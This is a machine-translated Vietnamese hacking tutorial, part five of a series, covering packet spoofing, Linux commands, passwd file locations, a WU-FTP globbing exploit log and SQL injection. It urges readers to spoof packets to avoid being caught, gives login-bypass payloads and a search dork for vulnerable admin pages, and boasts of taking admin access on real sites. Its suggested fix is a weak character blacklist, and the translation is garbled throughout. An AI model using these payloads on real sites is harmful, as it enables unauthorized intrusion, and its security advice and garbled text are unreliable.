The most basic insights to becoming a Hacker - Part 5

What is TCP / IP packet TCP / IP stands for Transmission Control Protocol and Internet Protocol, a TCP / IP packet is a block of compressed data, then attaches a header and sends it to another computer. This is how the internet transmits, by sending packets. The header in a packet contains the IP address of the sender.

31. What is TCP / IP packet?

TCP / IP stands for Transmission Control Protocol and Internet Protocol, a TCP / IP packet is a block of compressed data, then attaches a header and sends it to another computer. This is how the internet transmits, by sending packets. The header in a packet contains the IP address of the sender. You can rewrite a packet and make it in like coming from someone else !! You can use this way to find ways to access many systems without being caught. You will have to run on Linux or have a program that allows you to do this.

32. What is Linux:

In the original sense, Linux is the kernel of the OS. Multiplication is a software responsible for communication between computer application programs and hardware. Provide features such as file management, virtual memory management, devices that import but hard drive, monitor, keyboard, . But Linux kernel is not an OS yet, so the Linux kernel needs must link to the applications written by the GNU organization to create a complete operating system: the Linux operating system. This is also why we see GNU / Linux when referring to Linux.

Next, a company or an organization encapsulates these products (Multiply and Application Program) and then fixes some configurations to bring the identity of the company / organization and make additional installments. Set up (Installation Process) for that Linux set, we have: Distribution. Distribution is different in number and type of Software is packaged as well as installation process, and versions of Nhan. Some of today's major distributions of Linux are: Debian, Redhat, Mandrake, SlackWare, Suse.

33. Basic commands to know when using or entering Linux systems:

  1. "Man" command: When you want to know which command to use, you can use this command:
    1. Command structure: $ man.
    2. For example: $ man man
  2. "Uname" command: tells us the basic information about the system
    1. For example: $ uname -a; It will give the following information: Linux gamma 2.4.18 # 3 Wed Dec 26 10:50:09 ICT 2001 i686 unknown
  3. Id command: view current uid / gid (see current group and name)
  4. The w command: view the logged-in users and their actions on the system.
    1. For example: $ w will give the following information: 10:31 pm up 25 days, 4:07, 18 users, load average: 0.06, 0.01, 0.00
  5. Ps: see process information on the system
    1. For example: $ ps axuw
  6. Cd command: you want to move to any directory must use this command.
    1. For example: $ cd / usr / bin ----> will take you to the bin directory
  7. Mkdir command: create a directory.
    1. For example: $ mkdir / home / convit ---> it will create a convit folder in / home
  8. Rmdir: remove the directory
    1. For example: $ rmdir / home / conga ----> it will remove the conga directory in / home.
  9. Ls command: list directory contents
    1. For example: $ ls -laR /
  10. The printf: command prints the formatted data, similar to the C ++ printf () implementation.
    1. Example: $ printf% s "x41x41x41x41"
  11. Pwd command: give the current directory
    1. For example: $ pwd ------> it will tell us where our current location is: / home / level1
  12. The commands: cp, mv, rm mean: copy, move, delete files
    1. Example with rm (del) command: $ rm -rf / var / tmp / blah -----> it will del file blah.
  13. Do the same for cp, mv commands.
  14. Find: search files, directories
    1. For example: $ find / -user level2
  15. Grep command: search engine, the simplest way to use: grep "something"
    1. For example: $ ps axuw | grep "level1"
  16. Strings command: print out all the characters printed in a file. Use it to find string declarations in the program, or call system functions, sometimes find passwords too
    1. For example: $ strings / usr / bin / level1
  17. Strace command: (linux) trace system and signal function calls, extremely useful for monitoring program flow, the fastest way to determine which program has failed. On other unix systems, the equivalent tool is truss, ktrace.
    1. For example: $ strace / usr / bin / level1
  18. "Cat, more" command: print file contents to the screen
    1. $ cat / etc / passwd | more -> it will output the passwd file content in the fastest way.
    2. $ more / etc / passwd ----> It will output the file content passwd slowly.
  19. Hexdump command: print out the corresponding values ​​according to ascii, hex, octal, decimal of the input.
    1. For example: $ echo AAAA | hexdump
  20. Commands: cc, gcc, make, gdb: compilation and debugging tools.
    1. For example: $ gcc -o -g bof bof.c
    2. For example: $ make bof
    3. For example: $ gdb level1
    4. (gdb) break main
    5. (gdb) run
  21. Perl command: one language
    1. For example: $ perl -e 'print "A" x1024' | ./bufferoverflow (Buffer overflow error when we enter 1024 characters)
  22. "Bash" command: it's time to automate your tasks with shell scripts, very powerful and flexible. You want to find out about bash, see how it is: $ man bash
  23. Ls command: View directory contents (List files in the directory).
    1. For example: $ ls / home ----> will show all files in the Home folder
    2. $ ls -a -----> show all files, including hidden files
    3. $ ls -l -----> gives information about the files
  24. Order to write output data to 1 file:
    1. For example: $ ls / urs / bin> ~ / convoi ------> write data showing information of bin folder to a convoi file.

34. Basic insights around Linux:

a. Some important directories on the server:

  1. / home: where to store user files (eg the person who logs on to the system is named convit, there will be a directory of / home / convit)
  2. / bin: Where to handle essential Unix commands such as ls.
  3. / usr / bin: Where to handle other special commands, commands used by special users and system administrator.
  4. / bot: Where the kernel and other files are used when booting.
  5. / ect: Network operation files, NFS (Network File System) Letters (This is the critical place that we need to exploit the most)
  6. / var: Administrative files
  7. / usr / lib: Standard libraries like libc.a
  8. / usr / src: Source location of programs.

b. The file location contains passwd of several different versions:

CODE
AIX 3 / etc / security / passwd! / Tcb / auth / files //
A / UX 3.0s / tcb / files / auth /? / *
BSD4.3-Ren /etc/master.passwd *
ConvexOS 10 / etc / shadpw *
ConvexOS 11 / etc / shadow *
DG / UX / etc / tcb / aa / user / *
EP / IX / etc / shadow x
HP-UX /.secure/etc/passwd *
IRIX 5 / etc / shadow x
Linux 1.1 / etc / shadow *
OSF / 1 /etc/passwd[.dir|.pag] *
SCO Unix # .2.x / tcb / auth / files //
SunOS4.1 + c2 /etc/security/passwd.adjunct ## username
SunOS 5.0 / etc / shadow
System V Release 4.0 / etc / shadow x
System V Release 4.2 / etc / security / * database
Ultrix 4 /etc/auth[.dir|.pag] *
UNICOS / etc / udb *

35. Exploiting Linux bugs through security holes of WU-FTP server:

WU-FTP Server (developed by Washington University) is an FTP server software used quite commonly on Unix & Linux systems (all distributors: Redhat, Caldera, Slackware, Suse, Mandrake). .) and Windows ., hackers can execute their commands remotely via the globbing file by overwriting the file on the system.

However, exploiting this error is not easy because it must meet the following conditions:

+ Must have an account on the server.
+ Must put Shellcode into the memory of Process Server.
+ Must send a special FTP command containing a globbing special template without the server detecting an error.
+ Hacker will override a Function, Code to a Shellcode, it will probably be executed by the FTP Server itself.

Let's analyze the following example of overwriting files of FTP servers:

CODE
ftp> open localhost <== the command to open the page failed.
Connected to localhost (127.0.0.1).
220 sasha FTP server (Version wu-2.6.1-18) ready <== successful penetration of FTP server.
Name (localhost: root): anonymous <== Enter the name of this place
331 Guest login ok, send your complete e-mail address as password.
Password: ……… . <== enter the password here
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Sử dụng binary mode để chuyển đổi tập tin. <== use binary variables to convert files.
ftp> ls ~ {<== current directory listing command.
227 Entering Passive Mode (127,0,0,1,241,205)
421 Service is not available, remote server có kết nối
1405? S 0:00 ftpd: accepting connections on port 21 ç accept connection at port 21.
7611 tty3 S 1:29 gdb /usr/sbin/wu.ftpd
26256? S 0:00 ftpd:
sasha: anonymous / aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
26265 tty3 R 0:00 bash -c ps ax | grep ftpd
(gdb) at 26256
Attaching to program: /usr/sbin/wu.ftpd, process 26256 <== exploiting Wu.ftpd error.
Symbols already loaded for /lib/libcrypt.so.1
Symbols already loaded for /lib/libnsl.so.1
Symbols already loaded for /lib/libresolv.so.2
Symbols already loaded for /lib/libpam.so.0
Symbols already loaded for /lib/libdl.so.2
Symbols already loaded for /lib/i686/libc.so.6
Symbols already loaded for /lib/ld-linux.so.2
Symbols already loaded for /lib/libnss_files.so.2
Symbols already loaded for /lib/libnss_nisplus.so.2
Symbols already loaded for /lib/libnss_nis.so.2
0x40165544 in __libc_read () from /lib/i686/libc.so.6
(gdb) c
Continuing.
Chương trình nhận tín hiệu SIGSEGV, Segmentation fault.
__libc_free (mem = 0x61616161) at malloc.c: 3136
3136 in malloc.c

The exploitation through this error so far I have not tested successfully (do not know where to go wrong). So what can you do, post it for me to know.

The current Linux error is very small (especially for Redhat), please wait for any new error, then the 'Security hole' will update immediately. How to exploit them, ask the manager of that side, especially Leonhart, he diligently answers you.

(Based on the brother's article Binhnx2000)

36. Learn about SQL Injection:

SQL Injection is one of the most popular types of web hacking. By injecting SQL query / command code into input before passing it to a processing web application, you can login without a username and password, execute remote commands, retrieve data and retrieve the root of SQL server. The attack tool is any web browser, such as Internet Explorer, Netscape, Lynx, .

You can get a broken Web site by using search engines to find pages that allow data submission. Some Web pages pass parameters through hidden areas, so you must see the new viewsource. For example, we can identify this page using Submit data by looking at the code that we have viewedource:

CODE

 

Check to see if the Web page has this error by entering login and pass times as follows:

- Login: hi` or 1 = 1--
- Pass: hi` or 1 = 1--

If not, you can try the following login and pass:

CODE

`or 1 = 1--
`` or 1 = 1--
or 1 = 1--
`or` a` = `a
`` or `` a`` = `` a
`) or (` a` = `a

If successful, you can login without knowing the username and password.

This error is related to Query, so if you have ever learned through a database, it can be exploited easily only by typing Query commands on your browser. If you want to learn more about this error, you can find the vicky group articles to find out more.

37. For example, about Web hacking through an admentor error (A type of SQL Injection error):

First go to google.com to find the admentor Web site with the keyword 'allinurl: admentor'.

Usually you will have the following results:

http://www.someserver.com/admentor /admin/admin.asp

You try to enter "` or `` = `" into login and password:

CODE

Login: `or` `=`

Password: `or` `=`

If successful, you will be infiltrated into the Web as an admin.

Let's learn about how to fix this error:

+ Filter special characters like '`` `~' by inserting the javascripts in the following code:

CODE
function RemoveBad (strTemp)
{
strTemp = strTemp.replace (/ <|> | `` | `|% |; | (|) | & | + |
- / g, `` ``);
return strTemp;
}

And call it from within the asp script:

CODE
var login = var TempStr = RemoveBad
(Request.QueryString (`` login``));
var password = var TempStr = RemoveBad
(Request.QueryString (`` password``));

So we fixed the error.

You can apply this hack to other Web sites that have submitted data, please try it and see, the Vietnamese websites are very much, I have earned quite a bit of admin by trying this. already (but also told them to fix it).

There are many pages when login not by '`or` `=' 'but by real nick names registered on that Web site, go to the' member 'link to get an admin's password to test it.

Hack happy.

In Part 6 I will mention the type of denial-of-service attack (DoS attack), a powerful attack that has caused our powerful HVA Web site to be blocked in a short time when the admin is busy. Drink all coffee without anyone watching. Accompanying are the DoS attack methods that have been used.

GOOKLUCK !!!!!!!!!!!!!!!!!!!!

(Part 5) - TG: Anhdenday

The most basic insights to becoming a Hacker - Part 4
The most basic insights to becoming a Hacker - Part 3  
The most basic insights to becoming a Hacker - Part 2
The most basic insights to becoming a Hacker - Part 1  

5 ★ | 1 Vote